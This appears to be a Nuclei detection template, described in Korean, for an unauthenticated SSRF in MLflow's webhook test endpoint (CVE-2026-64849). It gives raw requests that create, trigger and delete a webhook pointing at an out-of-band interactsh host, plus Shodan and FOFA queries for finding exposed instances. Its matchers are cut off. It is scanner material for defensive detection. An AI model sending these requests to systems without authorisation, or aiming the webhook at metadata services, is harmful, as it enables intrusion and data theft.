
내부 또는 클라우드 메타데이터 서비스에 접근하고 리다이렉트 우회를 통해 응답 세부 정보를 유출하는 인증되지 않은 MLflow webhook SSRF(CVE-2026-64849)를 탐지합니다.
id: CVE-2026-64849
info: name: MLflow 웹훅 SSRF - 리다이렉트 우회를 통한 인증 없는 전체 읽기 author: DhiyaneshDk severity: critical description: | MLflow > 3.15.0은 웹훅 URL 검증 부적절로 인한 정보 공개 취약점을 포함하며, 공격자가 내부 또는 클라우드 메타데이터 서비스에 도달하여 응답 세부 정보를 획득할 수 있습니다. 이 취약점 악용에는 웹훅 테스트 엔드포인트에 대한 인증 없는 접근이 필요합니다. impact: | 공격자는 내부 또는 클라우드 메타데이터 서비스에 접근하여 응답 상태와 본문을 검색할 수 있으며, 잠재적으로 민감한 정보가 노출될 수 있습니다. remediation: | 리다이렉트 대상 및 DNS 리바인딩을 포함한 연결 시점 IP 검증을 제공하는 SSRFProtectedHTTPAdapter를 추가한 PR #24258이 포함된 버전으로 MLflow를 업그레이드하십시오. reference: - https://github.com/mlflow/mlflow/security/advisories/GHSA-7gwp-5pfp-969j - https://github.com/mlflow/mlflow/pull/24258 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cve-id: CVE-2026-64849 epss-score: 0.00349 epss-percentile: 0.27929 cwe-id: CWE-918 metadata: max-request: 3 verified: true shodan-query: http.title:"MLflow" fofa-query: title="MLflow" tags: cve,cve2026,mlflow,ssrf,oast,webhook,oss,vkev
variables: random: "{{rand_text_alpha(8)}}"
http:
raw:
| POST /api/2.0/mlflow/webhooks HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"name":"{{random}}","url":"https://{{interactsh-url}}","events":[{"entity":"REGISTERED_MODEL","action":"CREATED"}]}
| POST /api/2.0/mlflow/webhooks/{{webhook_id}}/test HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"webhook_id":"{{webhook_id}}","event":{"entity":"REGISTERED_MODEL","action":"CREATED"}}
| DELETE /api/2.0/mlflow/webhooks/{{webhook_id}} HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers:
type: word part: body_1 words:
type: word part: interactsh_protocol words:
extractors: